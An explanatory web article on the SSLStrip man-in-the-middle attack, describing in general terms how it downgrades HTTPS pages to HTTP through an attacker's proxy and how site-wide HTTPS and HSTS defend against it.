Since their introduction to the commercial market, SSL Certificates have gone through major security updates, and now boast an almost unbreakable level of encryption. However, the continuous SSL improvements, haven’t discouraged cynical attackers to come up with creative ways to try and steal the encrypted data. Although we’ve already written about the notorious man-in-the-middle-attacks, and SSL sniffing, one particular type of MitM attack deserves its own article. Please welcome the SSL Strip, a program that downgrades a website from HTTPS to HTTP. But first, a brief background of its creator: Moxie Marlinspike.
Marlinspike is far from being a hacker. In fact, he is a well-known American computer security researcher who advocates the widespread use of strong cryptography and PET (privacy-enhancing-technologies). In 2009, he spoke about this dangerous SSL weakness for the first time at the Black Hat information security event. What the SSL Strip does is pretty scary, but here’s the good news, you can easily prevent it. Before we reveal the solution, let’s see how the SSL Strip compromises the secure connection.
Why SSL Strip is so dangerous?
SSL Strip reroutes all the traffic coming from a victim’s machine towards a proxy created by the attacker. Now, let’s put ourselves in the shoes of the attacker. We’ve created a connection between the victim and our proxy server. It can intercept all the traffic that flows to us. Without using the SSL Strip we would simply receive the encrypted data, which we won’t be able to decode.
But things change drastically once we add the SSL Strip into the mix. If someone connects to our proxy server, with the Strip running in the background, the victim won’t get any alert from the browser about the SSL Certificate error. He/she won’t have any suspicion that an actual attack is taking place. So how can the SSL Strip trick both the browser and the website’s server?
The Strip takes advantage of the way most users come to SSL websites. The majority of visitors connect to a website’s page that redirects (ex: the 302 redirect), or they arrive on an SSL page via a link from a non-SSL site. If the victim wants, for instance, to buy a digital product and types the following URL in the address bar www.somedigitalproduct.com, the browser connects to the attacker machine and waits for a response from the server. The attacker, in turn, forwards the victim’s request to the online shop’s server and receives the secure HTTPS payment page. For example:https://www.somedigitalproduct.com.
At this point, the attacker has complete control over the secure payment page. He downgrades it from HTTPS to HTTP and sends it back to the victim’s browser. The browser is now redirected to http://www.somedigitalproduct.com. From now onward, all the victim’s data will be transferred in plain text format, and the attacker will be able to intercept it. Meanwhile, the website’s server will think that it has successfully established the secure connection. It did that indeed, but with the attacker’s machine, not the victim’s one.
How to protect your website from SSL Strip
Due to its nature, the SSL Strip can work only on websites that don’t encrypt pages beyond the login page. Websites that use both HTTP and HTTPS in their setup are prone to various security threats including the SSL Strip. To stay on the safe side, always use an SSL Certificate throughout the whole website. In other words, make sure to host all your content such as pictures, files and videos on HTTPS. Another layer of security capable of stopping the Strip is HSTS (Strict Transport Security). This mechanism instructs the browser to always connect only via HTTPS and not HTTP.